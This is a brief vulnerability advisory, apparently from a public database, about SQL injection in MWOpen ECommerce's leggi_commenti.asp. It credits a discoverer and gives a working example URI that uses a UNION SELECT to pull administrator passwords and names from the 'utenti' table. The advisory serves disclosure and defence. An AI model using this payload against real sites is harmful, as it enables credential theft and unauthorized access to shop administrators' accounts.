KiNgOfThEwOrLd is credited with the discovery of this vulnerability.
Vulnerable
MWOpen ECommerce 0
Not Vulnerable
Code
Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/[mwopen_path]/leggi_commenti.asp?id=9999+union+select+null,null,password,nome,null,data,null+from+utenti+where+Admin=true